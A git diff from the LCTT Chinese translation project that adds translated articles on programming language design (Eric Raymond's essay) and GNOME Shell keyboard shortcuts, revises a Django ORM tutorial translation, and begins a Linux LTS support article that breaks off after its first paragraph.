published/20171118 Language engineering for great justice.md
Normal file
59
published/20171118 Language engineering for great justice.md
Normal file
@ -0,0 +1,59 @@
|
||||
ESR:程序语言设计的要诣和真谛
|
||||
============================================================
|
||||
|
||||
当你真正掌握了整体化的工程设计思维时,你就会发现高屋建瓴的工程设计已经远远超越了技术优化的层面。我们的每一件创造都催生于人类活动的大背景下,被这种人类活动赋予了广泛的经济学意义、社会学意义,甚至于具有了奥地利经济学家所称的“<ruby>人类行为学意义<rt>praxeology</rt></ruby>”。而这种人类行为学意义则是明确的人类行为所能达到的最高层次。
|
||||
|
||||
对我来说这并不只是一种抽象的理论。当我在撰写关于开源项目开发的文章时,文章的内容正是关于人类行为学的 —— 这些文章并不涉及哪个具体的软件技术或者话题,而是在讨论科技所服务的人类行为。从人类行为学角度对科技进行更深入的理解,可以帮助我们重塑科技,并且提升我们的生产力和成就感。这种提升并不总是因为我们有了更新的工具,而更多的是因为我们改变了使用现有工具的思路,提升了我们对这些工具的驾驭能力。
|
||||
|
||||
在这个思路之下,我的随笔文章的第三篇中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统级别编程的新时代的到来。在这里,我会把我的统观见解总结成更具体的、更实用的对计算机语言设计的分析。例如总结出为什么一些语言会成功,另一些语言会失败。
|
||||
|
||||
在我最近的一篇文章中,我写道:所有计算机语言的设计都是对机器资源和程序员人力成本的相对权衡的结果;是对一种相对价值主张的体现。而这些设计思路都是在硬件算力成本不断下降,程序员人力成本相对稳定且可能不减反增的背景下产生的。我还强调了语言设计在实现了一些原有的权衡方案之后,其未来的转化和演变成本在这种语言的成败中所要扮演的一些额外角色。在文中我也阐述了编程语言设计者是如何为当前和可见的未来寻找新的最优设计方案的。
|
||||
|
||||
现在我要集中讲解一下我在上面段落里最后提到的那个概念,即语言设计工程师们其实可以在多个方面来改进和提高现阶段编程语言的设计水准。比如输入系统的优化,GC (垃圾回收机制) 和手动内存分配的权衡,命令导向、函数导向和面向对象导向的混合和权衡。但是站在人类行为学的角度去考量,我认为设计师们一定会做出更简单的设计权衡,即针对近景问题还是针对远景问题来优化一种语言的设计。
|
||||
|
||||
所谓的“远”、“近”之分,是指随着硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据这些因素的变化曲线所做出的判断。近景问题是编程人员眼下看到的问题,远景问题则是指可预见的,但未必会很快到来的一系列情况。针对近景问题的解决方案可以被很快部署下去,且能够在短期内非常有效,但随着情况的变化和时间的推移,这种方案可能很快就不适用了。而远景的解决方案可能因为其自身的复杂和超前性而夭折,或是因其代价过高无法被接受和采纳。
|
||||
|
||||
在计算机刚刚面世的时候, FORTRAN 就是一个近景设计方案, LISP 语言的设计则是针对远景问题;汇编语言多是近景设计方案,很好的阐明了这类设计很适用于非通用语言,同样的例子还包括 ROFF 标记语言。PHP 和 Javascript 则是我们后来看到的采用了近景设计思维的语言。那么后来的远景设计方案有哪些例子呢? Oberon、Ocaml、ML、XML-Docbook 都是它的例子。学术研究中设计出的语言多倾向于远景设计,因为在学术研究领域,原创性以及大胆的假设与想法是很重要的。这和学术研究的动机以及其奖励机制很有关系(值得注意的是,在学术研究中,倾向于远景设计的本源动机并非出于技术方面的原因,而是出自于人类行为,即标新立异才能在学术上有成绩)。学术研究中设计出的编程语言是注定会失败的;因为学术研究的产物常常有高昂的转入成本,无人问津的设计。这类语言也因为在社区中不够流行而不能得到主流的采纳,具有孤立性,且常常被搁置成为半成品。(如上所述的问题正是对 LISP 历史的精辟总结,而且我是以一个对 LISP 语言有深入研究,并深深喜爱它的使用者的身份来评价 LISP 的)。
|
||||
|
||||
一些近景设计的失败案例则更加惨不忍睹。对这些案例来说,我们能够期待的最好的结果就是这种语言可以消亡的相对体面一些,被一种新的语言设计取而代之。如果这些近景设计导向的语言没有死亡而是一直被沿用下去(通常是因为转化成本过高),那么我们则会看到不断有新的特性和功能在这些语言原来的基础之上堆积起来,以保持它们的可用性和有效性。直到这种堆积把这些语言变得越来越复杂,变的危若累卵且不可理喻。是的,我说的就是 C++ 。当然, 还有 Javascript。Perl 也不例外,尽管它的设计者 Larry Walls 有不错的设计品味,避免了很多问题,让这种语言得以存活了很多年。但也正是因为 Larry Walls 的好品味,让他在最终对 Perl 的固有问题忍无可忍之后发布了全新的 Perl 6。
|
||||
|
||||
从这种角度去思考程序语言,我们则可以把语言设计中需要侧重的目标重新归纳为两部分: (1)以时间的远近为轴,在远景设计和近景设计之间选取一个符合预期的最佳平衡点;(2)降低由一种或多种语言转化为这种新语言的转入成本,这样就可以更好地吸纳其它语言的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
|
||||
|
||||
在整个计算机发展史中,没有谁能比 C 语言在选择远景和近景设计的平衡点的时候做的更完美。事实胜于雄辩,作为一种实用的主流语言,C 语言有着很长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来 C 语言的终结仍旧不会到来。
|
||||
|
||||
当然,你可以把 C 语言的持久存在归功于文化惰性,但那是对“文化惰性”这个词的曲解,C 语言一直得以延续的真正原因是因为目前还没有人能提供另一种足够好的语言,可以抵消取代 C 语言所需要的转化成本!
|
||||
|
||||
相反的,C 语言低廉的<ruby>内向转化成本<rt>inward transition costs</rt></ruby>(转入成本)并未引起大家应有的重视,C 语言几乎是唯一的一个极其多样和强大的编程工具,以至于从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN、Pascal、汇编语言和 LISP 的编程习惯。在一九八零年代我就注意到,我常常可以根据一个 C 语言新人的编码风格判断出他之前在使用什么语言,这也从另一方面证明了 C 语言可以轻松的被其它语言的使用者所接受,并吸引他们加入进来。
|
||||
|
||||
C++ 语言同样胜在它低廉的转化成本。很快,大部分新兴的语言为了降低自身的转入成本,都纷纷参考了 C 语言的语法。值得注意的是这给未来的语言设计带来了一种影响:即新语言的设计都在尽可能的向 C 的语法靠拢,以便这种新语言可以有很低的内向转化成本(转入成本),使其他语言的使用者可以欣然接受并使用这种新语言。
|
||||
|
||||
另一种降低转入成本的方法则是把一种编程语言设计的极其简单并容易入手,让那些即使是没有编程经验的人都可以轻松学会。但做到这一点并非易事。我认为只有一种语言 —— Python —— 成功的做到了这一点,即通过易用的设计来降低内向转化成本。对这种程序语言的设计思路我在这里一带而过,因为我并不认为一种系统级别的语言可以被设计的像 Python 一样傻瓜易用,当然我很希望我的这个论断是错的。
|
||||
|
||||
而今我们已经来到 2017 年末尾,你一定猜测我接下来会向那些 Go 语言的鼓吹者一样对 Go 大加赞赏一番,然后激怒那些对 Go 不厌其烦的人群。但其实我的观点恰恰相反,我认为 Go 本身很有可能在许多方面遭遇失败。Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出某些方面的改变了,Go 团队也无动于衷,这是个大问题。目前,Go 语言的 GC 延迟问题以及用以平衡延迟而牺牲掉的吞吐量,都可能会严重制约这种语言的适用范围。
|
||||
|
||||
即便如此,在 Go 的设计中还是蕴含了一个让我颇为认同的远大战略目标。想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。正如我之前提到的,这个问题就是,随着软件工程项目和系统的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理故障一直是导致系统崩溃和安全漏洞的主要元凶。
|
||||
|
||||
我们现在已经认清,一种语言要想取代 C 语言,它的设计就必须遵循两个十分重要准则:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。从人类行为学的角度来纵观编程语言的历史,我们不难发现,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那设计者所做的其它部分做得再好都不算数。相反的,如果一种 C 的替代语言把转入成本过高这个问题解决地很好,即使它在其他部分做的不是最好的,人们也不会对这种语言吹毛求疵。
|
||||
|
||||
而 Go 正是遵循了上述两点设计思路,虽然这个思路并不是一种完美无瑕的设计理论,也有其局限性。比如,目前 GC 延迟的问题就限制了 Go 的推广。但是 Go 目前选择了照搬 Unix 下 C 语言的传染战略,把其自身设计成一种易于转入,便于传播的语言。这样它的广泛和快速的传播就会使其迅速占领市场,从而打败那些针对远景设计的看起来更好的语言。
|
||||
|
||||
没错,我所指的这个远景设计方案就是 Rust。而 Rust 的自身定位也正是一种远景和长期的 C 语言替代方案。我曾经在之前的一些文章中解释过我为什么认为 Rust 还没有做好和 Go 展开竞争的准备。TIBOE 和 PYPL 的语言评价指数榜也很好的证明了我的对于 Rust 的这个观点。在 TIBOE 上 Rust 从来没有进过前 20 名。而在 TIBOE 和 PYPL 两个指数榜上, Rust 都要比 Go 的表现差很多。
|
||||
|
||||
五年后的 Rust 会发展的怎样还未可知。但如果 Rust 社区的开发人员对这种语言的设计抱着认真投入的态度,并愿意倾听,那么我建议他们要特别重视转入成本的问题。以我个人经历来说,目前由 C 语言转入 Rust 语言的壁垒很高,使人望而却步。如果 Corrode 之类的 Code-lifting 工具只是把 C 语言映射为不安全的 Rust 语言,那么 Corrode 这类工具也是不能解决这种转入壁垒的。或者如果有更简单的方法能够自动注释代码的所有权或生命周期,那么编译器就能把 C 代码直接映射到 Rust,人们也不再需要 Corrode 这一类工具了。目前我还不知道这个问题要如何解决,但我觉得 Rust 社区最好能够找到一种解决方案来代替 Corrode 和其同类工具。
|
||||
|
||||
在最后我想强调一下,Ken Thompson 曾经有过语言设计的辉煌历史。他设计的一些语言虽然看起来只是为了解决近景问题,实际上却具有很高的质量和开放程度,让这些语言同样非常适合远景问题,非常易于被提高和拓展。当然 Unix 也是这样的, 这让我不禁暗自揣测,那些我认为的 Go 语言中乍看上去不利于其远景发展的一些令人担忧烦扰的设计(例如缺乏泛型)也许并没有我想象的那样糟糕。如果确如我所认为的那样,即这些设计会影响 Go 的远景发展,那么恐怕我真的是比 Ken 还要聪明有远见了。但是我并不认为我有那么高明。Go 的前途我们还是只能拭目以待。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://esr.ibiblio.org/?p=7745
|
||||
|
||||
作者:[Eric Raymond][a]
|
||||
译者:[Valoniakim](https://github.com/Valoniakim),[yunfengHe](https://github.com/yunfengHe)
|
||||
校对:[yunfengHe](https://github.com/yunfengHe),[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://esr.ibiblio.org/?author=2
|
||||
[1]:http://esr.ibiblio.org/?author=2
|
||||
[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931
|
||||
[3]:http://esr.ibiblio.org/?p=7745
|
@ -0,0 +1,73 @@
|
||||
你或许不知道的实用 GNOME Shell 快捷键
|
||||
=======================================
|
||||
|
||||
![](https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-00-featured.jpg)
|
||||
|
||||
由于 Ubuntu 在 17.10 发行版本中转移到了 GNOME Shell,许多用户可能对那些实用的快捷键以及创建自己的快捷键感兴趣。这篇文章就是介绍这两方面的。
|
||||
|
||||
### 已有的便捷的 GNOME Shell 快捷键
|
||||
|
||||
如果你希望 GNOME 有成百上千种快捷键,你会失望地发现,情况并非如此。快捷键的列表不会太长,而且并不是全部都对你有用,但仍然会有许多快捷键可以用得上的。
|
||||
|
||||
![gnome-shortcuts-01-settings][1]
|
||||
|
||||
可以通过菜单“设置 -> 设备 -> 键盘”访问快捷方式列表。以下是一些不太流行但实用的快捷方式。
|
||||
|
||||
* `Ctrl` + `Alt` + `T` - 这是一个用来启动终端的快捷键组合,你可以在 GNOME 的任何地方使用它。
|
||||
|
||||
我个人经常使用的两个快捷键是:
|
||||
|
||||
* `Alt` + `F4` - 关闭最顶层端口
|
||||
* `Alt` + `F8` - 调整窗口大小
|
||||
|
||||
大多数人都知道如何用 `Alt` + `Tab` 在打开的应用程序窗口之间,但是你可能不知道可以使用 `Alt` + `Shift` + `Tab` 在应用程序窗口之间进行反方向切换。
|
||||
|
||||
在切换窗口界面时,另一个有用的组合键是 `Alt` + `~` (`tab` 键上面的一个键)。
|
||||
|
||||
要是你想显示活动概览,你可以用快捷键 `Alt` + `F1`。
|
||||
|
||||
有很多跟工作台有关的快捷键。如果你像我那样不经常使用多个工作台的话,这些快捷键对来说是没用的。尽管如此,以下几个快捷键还是值得留意的:
|
||||
|
||||
* `Super` + `PageUp` (或者 `PageDown` )移动到上方或下方的工作台
|
||||
* `Ctrl` + `Alt` + `Left` (或 `Right` )移动到左侧或右侧的工作台
|
||||
|
||||
如果在这些快捷键中加上 `Shift` ,例如 `Shift` + `Ctrl` + `Alt` + `Left`,则可以把当前窗口移动到其他工作区。
|
||||
|
||||
另一个我最喜欢是辅助功能中的调整文字大小的快捷键。你可以用 `Ctrl` + `+` (或 `Ctrl` + `-` )快速缩放字体大小。在某些情况下,这个快捷键可能默认是禁用的,所以在尝试之前请先检查一下。
|
||||
|
||||
上述是一些鲜为人知但是十分实用的键盘快捷键。如果你想知道更多实用的快捷键,可以查看[官方 GNOME Shell 快捷键列表][2]。
|
||||
|
||||
### 如何创建自己的 GNOME Shell 快捷键
|
||||
|
||||
如果默认的快捷键不符合您的喜好,可以更改它们或创建新的快捷键。你同样可以通过菜单“设置 -> 设备 -> 键盘“完成这些操作。当你选择想更改的快捷键条目时,下面的对话框就会弹出。
|
||||
|
||||
![gnome-shortcuts-02-change-shortcut][3]
|
||||
|
||||
输入你想要的键盘快捷键组合。
|
||||
|
||||
![gnome-shortcuts-03-set-shortcut][4]
|
||||
|
||||
如果这个快捷键已经被使用,你会得到一个消息。如果没有,只需点击设置,就完成了。
|
||||
|
||||
如果要添加新快捷键而不是更改现有快捷键,请向下滚动,直到看到 “+” 标志,单击它,在出现的对话框中输入新键盘快捷键的名称和快捷键组合。
|
||||
|
||||
![gnome-shortcuts-04-add-custom-shortcut][5]
|
||||
|
||||
GNOME 默认情况下并没有提供大量的 shell 快捷键,上面列出的是一些比较实用的快捷键。如果这些快捷键对你来说不够,你可以随时创建自己的快捷键。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/gnome-shell-keyboard-shortcuts/
|
||||
|
||||
作者:[Ada Ivanova][a]
|
||||
译者:[imquanquan](https://github.com/imquanquan)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com/author/adaivanoff/
|
||||
[1]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-01-settings.jpg (gnome-shortcuts-01-settings)
|
||||
[2]:https://wiki.gnome.org/Projects/GnomeShell/CheatSheet
|
||||
[3]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-02-change-shortcut.png (gnome-shortcuts-02-change-shortcut)
|
||||
[4]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-03-set-shortcut.png (gnome-shortcuts-03-set-shortcut)
|
||||
[5]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-04-add-custom-shortcut.png (gnome-shortcuts-04-add-custom-shortcut)
|
@ -1,19 +1,19 @@
|
||||
Django ORM 简介
|
||||
============================================================
|
||||
|
||||
### 学习怎么去使用 Python 的 web 框架中的对象关系映射与你的数据库交互,就像你使用 SQL 一样。
|
||||
> 学习怎么去使用 Python 的 web 框架中的对象关系映射与你的数据库交互,就像你使用 SQL 一样。
|
||||
|
||||
|
||||
![Getting to know the Django ORM](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/web-spider-frame-framework.png?itok=Rl2AG2Dc "Getting to know the Django ORM")
|
||||
Image by : [Christian Holmér][10]. Modified by Opensource.com. [CC BY-SA 4.0][11]
|
||||
|
||||
|
||||
你可能听说过 [Django][12],它是一个被称为“完美主义者的最后期限” 的 Python web 框架。它是一匹 [可爱的小矮马][13]。
|
||||
|
||||
Django 的其中一个强大的功能是它的对象关系映射(ORM),它允许你去和你的数据库交互,就像你使用 SQL 一样。事实上,Django 的 ORM 就是创建 SQL 去查询和维护数据库的一个 Python 的方法,并且在一个 Python 方法中获取结果。 我说 _就是_ 一种方法,但实际上,它是一项非常聪明的工程,它利用了 Python 中比较复杂的部分,使得开发过程更容易。
|
||||
Django 的一个强大的功能是它的<ruby>对象关系映射<rt>Object-Relational Mapper</rt></ruby>(ORM),它允许你就像使用 SQL 一样去和你的数据库交互。事实上,Django 的 ORM 就是创建 SQL 去查询和操作数据库的一个 Python 式方式,并且获得 Python 风格的结果。 我说的_是_一种方式,但实际上,它是一种非常聪明的工程方法,它利用了 Python 中一些很复杂的部分,而使得开发者更加轻松。
|
||||
|
||||
在我们开始去了解 ORM 是怎么工作的之前,我们需要一个去操作的数据库。和任何一个关系型数据库一样,我们需要去定义一堆表和它们的关系(即,它们相互之间联系起来的方式)。让我们使用我们熟悉的东西。比如说,我们需要去建立一个有博客文章和作者的博客。每个作者有一个名字。一位作者可以有很多的博客文章。一篇博客文章可以有很多的作者、标题、内容和发布日期。
|
||||
在我们开始去了解 ORM 是怎么工作之前,我们需要一个可以操作的数据库。和任何一个关系型数据库一样,我们需要去定义一堆表和它们的关系(即,它们相互之间联系起来的方式)。让我们使用我们熟悉的东西。比如说,我们需要去建模一个有博客文章和作者的博客。每个作者有一个名字。一位作者可以有很多的博客文章。一篇博客文章可以有很多的作者、标题、内容和发布日期。
|
||||
|
||||
在 Django-ville 中,这个文章和作者的概念可以被称为博客应用。在这个语境中,一个应用是一个自包含一系列描述我们的博客行为和功能的模型和视图。用正确的方式打包,以便于其它的 Django 项目可以使用我们的博客应用。在我们的项目中,博客正是其中的一个应用。比如,我们也可以有一个论坛应用。但是,我们仍然坚持我们的博客应用的原有范围。
|
||||
在 Django 村里,这个文章和作者的概念可以被称为博客应用。在这个语境中,一个应用是一个自包含一系列描述我们的博客行为和功能的模型和视图的集合。用正确的方式打包,以便于其它的 Django 项目可以使用我们的博客应用。在我们的项目中,博客正是其中的一个应用。比如,我们也可以有一个论坛应用。但是,我们仍然坚持我们的博客应用的原有范围。
|
||||
|
||||
这是为这个教程事先准备的 `models.py`:
|
||||
|
||||
@ -36,23 +36,11 @@ class Post(models.Model):
|
||||
return self.title
|
||||
```
|
||||
|
||||
更多的 Python 资源
|
||||
现在,看上去似乎有点令人恐惧,因此,我们把它分解来看。我们有两个模型:作者(`Author`)和文章(`Post`)。它们都有名字(`name`)或者标题(`title`)。文章有个放内容的大的文本字段,以及用于发布时间和日期的 `DateTimeField`。文章也有一个 `ManyToManyField`,它同时链接到文章和作者。
|
||||
|
||||
* [Python 是什么?][1]
|
||||
大多数的教程都是从头开始的,但是,在实践中并不会发生这种情况。实际上,你会得到一堆已存在的代码,就像上面的 `model.py` 一样,而你必须去搞清楚它们是做什么的。
|
||||
|
||||
* [最好的 Python IDEs][2]
|
||||
|
||||
* [最好的 Python GUI 框架][3]
|
||||
|
||||
* [最新的 Python 内容][4]
|
||||
|
||||
* [更多的开发者资源][5]
|
||||
|
||||
现在,看上去似乎有点令人恐惧,因此,我们把它分解来看。我们有两个模型:作者和文章。它们都有名字或者标题。文章为内容设置一个大文本框,以及为发布的时间和日期设置一个 `DateTimeField`。文章也有一个 `ManyToManyField`,它同时链接到文章和作者。
|
||||
|
||||
大多数的教程都是从 scratch—but 开始的,但是,在实践中并不会发生这种情况。实际上,它会提供给你一堆已存在的代码,就像上面的 `model.py` 一样,而你必须去搞清楚它们是做什么的。
|
||||
|
||||
因此,现在你的任务是去进入到应用程序中去了解它。做到这一点有几种方法,你可以登入到 [Django admin][14],一个 Web 后端,它有全部列出的应用和操作它们的方法。我们先退出它,现在我们感兴趣的东西是 ORM。
|
||||
因此,现在你的任务是去进入到应用程序中去了解它。做到这一点有几种方法,你可以登入到 [Django admin][14],这是一个 Web 后端,它会列出全部的应用和操作它们的方法。我们先退出它,现在我们感兴趣的东西是 ORM。
|
||||
|
||||
我们可以在 Django 项目的主目录中运行 `python manage.py shell` 去访问 ORM。
|
||||
|
||||
@ -74,13 +62,13 @@ Type "help", "copyright", "credits" or "license" for more information.
|
||||
|
||||
它导入了全部的博客模型,因此,我们可以玩我们的博客了。
|
||||
|
||||
首先,我们列出所有的作者。
|
||||
首先,我们列出所有的作者:
|
||||
|
||||
```
|
||||
>>> Author.objects.all()
|
||||
```
|
||||
|
||||
我们将从这个命令取得结果,它是一个 `QuerySet`,它列出了所有我们的作者对象。它不会充满我们的整个控制台,因为,如果有很多查询结果,Django 将自动截断输出结果。
|
||||
我们将从这个命令取得结果,它是一个 `QuerySet`,它列出了我们所有的作者对象。它不会充满我们的整个控制台,因为,如果有很多查询结果,Django 将自动截断输出结果。
|
||||
|
||||
```
|
||||
>>> Author.objects.all()
|
||||
@ -88,7 +76,7 @@ Type "help", "copyright", "credits" or "license" for more information.
|
||||
<Author: Jen Wike Huger>, '...(remaining elements truncated)...']
|
||||
```
|
||||
|
||||
我们可以使用 `get` 代替 `all` 去检索单个作者。但是,我们需要一些更多的信息去 `get` 一个单个记录。在关系型数据库中,表有一个主键,它唯一标识了表中的每个记录,但是,作者名并不唯一。许多人都 [重名][16],因此,它不是唯一约束的一个好的选择。解决这个问题的一个方法是使用一个序列(1、2、3...)或者一个通用唯一标识符(UUID)作为主键。但是,因为它对人类并不可用,我们可以通过使用 `name` 来操作我们的作者对象。
|
||||
我们可以使用 `get` 代替 `all` 去检索单个作者。但是,我们需要一些更多的信息才能 `get` 一个单个记录。在关系型数据库中,表有一个主键,它唯一标识了表中的每个记录,但是,作者名并不唯一。许多人都 [重名][16],因此,它不是唯一约束的好选择。解决这个问题的一个方法是使用一个序列(1、2、3 ……)或者一个通用唯一标识符(UUID)作为主键。但是,因为它对人类并不好用,我们可以通过使用 `name` 来操作我们的作者对象。
|
||||
|
||||
```
|
||||
>>> Author.objects.get(name="VM (Vicky) Brasseur")
|
||||
@ -105,7 +93,7 @@ u'VM (Vicky) Brasseur'
|
||||
|
||||
然后,很酷的事件发生了。通常在关系型数据库中,如果我们希望去展示其它表的信息,我们需要去写一个 `LEFT JOIN`,或者其它的表耦合函数,并确保它们之间有匹配的外键。而 Django 可以为我们做到这些。
|
||||
|
||||
在我们的模型中,由于作者写了很多的文章,因此,我们的作者对象可以检查它自己的文章。
|
||||
在我们的模型中,由于作者写了很多的文章,因此,我们的作者对象可以检索他自己的文章。
|
||||
|
||||
```
|
||||
>>> vmb.posts.all()
|
||||
@ -114,8 +102,8 @@ QuerySet[<Post: "7 tips for nailing your job interview">,
|
||||
<Post: "Quit making these 10 common resume mistakes">,
|
||||
'...(remaining elements truncated)...']
|
||||
```
|
||||
|
||||
We can manipulate `QuerySets` using normal pythonic list manipulations.
|
||||
|
||||
我们可以使用正常的 Python 式的列表操作方式来操作 `QuerySets`。
|
||||
|
||||
```
|
||||
>>> for post in vmb.posts.all():
|
||||
@ -126,20 +114,18 @@ We can manipulate `QuerySets` using normal pythonic list manipulations.
|
||||
Quit making these 10 common resume mistakes
|
||||
```
|
||||
|
||||
去实现更复杂的查询,我们可以使用过滤得到我们想要的内容。这是非常微妙的。在 SQL 中,你可以有一些选项,比如,`like`、`contains`、和其它的过滤对象。在 ORM 中这些事情也可以做到。但是,是通过 _特别的_ 方式实现的:是通过使用一个隐式(而不是显式)定义的函数实现的。
|
||||
要实现更复杂的查询,我们可以使用过滤得到我们想要的内容。这有点复杂。在 SQL 中,你可以有一些选项,比如,`like`、`contains` 和其它的过滤对象。在 ORM 中这些事情也可以做到。但是,是通过 _特别的_ 方式实现的:是通过使用一个隐式(而不是显式)定义的函数实现的。
|
||||
|
||||
如果在我的 Python 脚本中调用了一个函数 `do_thing()`,我期望在某个地方有一个匹配 `def do_thing`。这是一个显式的函数定义。然而,在 ORM 中,你可以调用一个 _不显式定义的_ 函数。之前,我们使用 `name` 去匹配一个名字。但是,如果我们想做一个子串搜索,我们可以使用 `name__contains`。
|
||||
如果在我的 Python 脚本中调用了一个函数 `do_thing()`,我会期望在某个地方有一个匹配的 `def do_thing`。这是一个显式的函数定义。然而,在 ORM 中,你可以调用一个 _不显式定义的_ 函数。之前,我们使用 `name` 去匹配一个名字。但是,如果我们想做一个子串搜索,我们可以使用 `name__contains`。
|
||||
|
||||
```
|
||||
>>> Author.objects.filter(name__contains="Vic")
|
||||
QuerySet[<Author: VM (Vicky) Brasseur>, <Author: Victor Hugo">]
|
||||
```
|
||||
|
||||
现在,关于双下划线(`__`)我有一个小小的提示。这些是 Python _特有的_。在 Python 的世界里,你可以看到如 `__main__` 或者 `__repr__`。这些有时被称为 `dunder methods`,是 “双下划线” 的缩写。这里仅有几个非字母数字字符可以被用于 Python 中的对象名字;下划线是其中的一个。这些在 ORM 中被用于不同的过滤关键字的显式分隔。在底层,字符串被这些下划线分割。并且这个标记是分开处理的。`name__contains` 被替换成 `attribute: name, filter: contains`。在其它编程语言中,你可以使用箭头代替,比如,在 PHP 中是 `name->contains`。不要被双下划线吓着你,正好相反,它们是 Python 的好帮手(并且如果你斜着看,你就会发现它看起来像一条小蛇,想去帮你写代码的小蟒蛇)。
|
||||
现在,关于双下划线(`__`)我有一个小小的提示。这些是 Python _特有的_。在 Python 的世界里,你可以看到如 `__main__` 或者 `__repr__`。这些有时被称为 `dunder methods`,是 “<ruby>双下划线<rt>double underscore</rt></ruby>” 的缩写。仅有几个非字母数字的字符可以被用于 Python 中的对象名字;下划线是其中的一个。这些在 ORM 中被用于显式分隔<ruby>过滤关键字<rt>filter key name</rt></ruby>的各个部分。在底层,字符串用这些下划线分割开,然后这些标记分开处理。`name__contains` 被替换成 `attribute: name, filter: contains`。在其它编程语言中,你可以使用箭头代替,比如,在 PHP 中是 `name->contains`。不要被双下划线吓着你,正好相反,它们是 Python 的好帮手(并且如果你斜着看,你就会发现它看起来像一条小蛇,想去帮你写代码的小蟒蛇)。
|
||||
|
||||
ORM 是非常强大并且是 Python 特有的。不过,在 Django 的管理网站上我提到过上面的内容。
|
||||
|
||||
### [django-admin.png][6]
|
||||
ORM 是非常强大并且是 Python 特有的。不过,还记得我在上面提到过的 Django 的管理网站吗?
|
||||
|
||||
![Django Admin](https://opensource.com/sites/default/files/u128651/django-admin.png "Django Admin")
|
||||
|
||||
@ -147,13 +133,13 @@ Django 的其中一个非常精彩的用户可访问特性是它的管理界面
|
||||
|
||||
ORM,有多强大?
|
||||
|
||||
### [django-admin-author.png][7]
|
||||
|
||||
![Authors list in Django Admin](https://opensource.com/sites/default/files/u128651/django-admin-author.png "Authors list in Django Admin")
|
||||
|
||||
好吧!给你一些代码去创建最初的模型,Django 转到基于 web 的门户,它是非常强大的,它可以使用我们前面用过的同样的原生函数。默认情况下,这个管理门户只有基本的东西,但这只是在你的模型中添加一些定义去改变外观的问题。例如,在早期的这些 `__str__` 方法中,我们使用这些去定义作者对象应该有什么?(在这种情况中,比如,作者的名字),做了一些工作后,你可以创建一个界面,让它看起来像一个内容管理系统,以允许你的用户去编辑他们的内容。(例如,为一个标记为 “已发布” 的文章,增加一些输入框和过滤)。
|
||||
好吧!给你一些代码去创建最初的模型,Django 就变成了一个基于 web 的门户,它是非常强大的,它可以使用我们前面用过的同样的原生函数。默认情况下,这个管理门户只有基本的东西,但这只是在你的模型中添加一些定义去改变外观的问题。例如,在早期的这些 `__str__` 方法中,我们使用这些去定义作者对象应该有什么?(在这种情况中,比如,作者的名字),做了一些工作后,你可以创建一个界面,让它看起来像一个内容管理系统,以允许你的用户去编辑他们的内容。(例如,为一个标记为 “已发布” 的文章,增加一些输入框和过滤)。
|
||||
|
||||
如果你想去了解更多内容,[Django 美女的教程][17] 中关于 [the ORM][18] 的节有详细的介绍。在 [Django project website][19] 上也有丰富的文档。
|
||||
如果你想去了解更多内容,[Django 美女的教程][17] 中关于 [the ORM][18] 的节有详细的介绍。在 [Django project website][19] 上也有丰富的文档。
|
||||
|
||||
(题图 [Christian Holmér][10],Opensource.com 修改. [CC BY-SA 4.0][11])
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
@ -165,9 +151,9 @@ Katie McLaughlin - Katie 在过去的这几年有许多不同的头衔,她以
|
||||
|
||||
via: https://opensource.com/article/17/11/django-orm
|
||||
|
||||
作者:[Katie McLaughlin Feed ][a]
|
||||
作者:[Katie McLaughlin][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,55 @@
|
||||
Linux 长期支持版关于未来的声明
|
||||
===============================
|
||||
|
||||
> Linux 4.4 长期支持版(LTS)将得到 6年的使用期,但是这并不意味着其它长期支持版的使用期将持续这么久。
|
||||
|
||||
[视频](http://android-streaming.techrepublic.com/media/2014/10/17/343832643820/1242911146001_1697467424001_zdnet-linux-linus-2point7_1189834_740.mp4)
|
||||
|
||||
_视频: Torvalds 对内核版本 2.6 的弹性感到惊讶_
|
||||
|
||||
在 2017 年 10 月,[Linux 内核小组同意将 Linux 长期支持版(LTS)的下一个版本的生命期从两年延长至六年][5],而 LTS 的下一个版本正是 [Linux 4.14][6]。这对于 [Android][7],嵌入式 Linux 和 Linux 物联网(IoT)的开发者们是一个利好。但是这个变动并不意味着将来所有的 Linux LTS 版本将有 6 年的使用期。
|
||||
|
||||
